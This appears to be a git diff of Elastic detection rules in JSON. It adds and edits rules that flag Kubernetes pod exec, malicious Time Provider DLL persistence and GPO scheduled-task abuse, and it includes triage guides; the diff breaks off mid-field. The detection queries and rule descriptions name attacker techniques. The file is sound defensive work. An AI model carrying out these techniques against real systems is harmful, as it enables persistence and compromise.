a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_203.json b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_203.json new file mode 100644 index 00000000000..113c49d7b3b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_203.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects a user attempt to establish a shell session into a pod using the 'exec' command. Using the 'exec' command in a pod allows a user to establish a temporary shell session and execute any process/commands in the pod. An adversary may call bash to gain a persistent interactive shell which will allow access to any data the pod has permissions to, including secrets.", + "false_positives": [ + "An administrator may need to exec into a pod for a legitimate reason like debugging purposes. Containers built from Linux and Windows OS images, tend to include debugging utilities. In this case, an admin may choose to run commands inside a specific container with kubectl exec ${POD_NAME} -c ${CONTAINER_NAME} -- ${CMD} ${ARG1} ${ARG2} ... ${ARGN}. For example, the following command can be used to look at logs from a running Cassandra pod: kubectl exec cassandra --cat /var/log/cassandra/system.log . Additionally, the -i and -t arguments might be used to run a shell connected to the terminal: kubectl exec -i -t cassandra -- sh" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes User Exec into Pod", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb:\"create\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.objectRef.subresource:\"exec\"\n", + "references": [ + "https://kubernetes.io/docs/tasks/debug/debug-application/debug-running-pod/", + "https://kubernetes.io/docs/tasks/debug/debug-application/get-shell-running-container/" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.subresource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14de811c-d60f-11ec-9fd7-f661ea17fbce", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1609", + "name": "Container Administration Command", + "reference": "https://attack.mitre.org/techniques/T1609/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "14de811c-d60f-11ec-9fd7-f661ea17fbce_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json index f6b073d1368..f2915acf69f 100644 --- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json index 746c1f0ccfa..88b07ee351c 100644 --- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json index df451e7d6cb..a7af6b143e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json index 44756d4a656..63110618610 100644 --- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106.json new file mode 100644 index 00000000000..f8f634ea3d6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106.json @@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Persistence via Time Provider Modification", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence via Time Provider Modification\n\nThe Time Provider architecture in Windows is responsible for obtaining accurate timestamps from network devices or clients. It is implemented as a DLL file in the System32 folder and is initiated by the W32Time service during Windows startup. Adversaries may exploit this by registering and enabling a malicious DLL as a time provider to establish persistence. \n\nThis rule identifies changes in the registry paths associated with Time Providers, specifically targeting the addition of new DLL files.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore Time Provider settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\"\n ) and\n registry.data.strings:\"*.dll\"\n", + "references": [ + "https://pentestlab.blog/2019/10/22/persistence-time-providers/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json index 1ab87f59278..a179375ad96 100644 --- a/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json index 10453a35f8a..49615843fc7 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "host.os.type:windows and\n(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -75,7 +75,7 @@ ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json index 60a5b8164e2..a57e03214b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json index d2d78ee5c2e..1d3a38459f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success 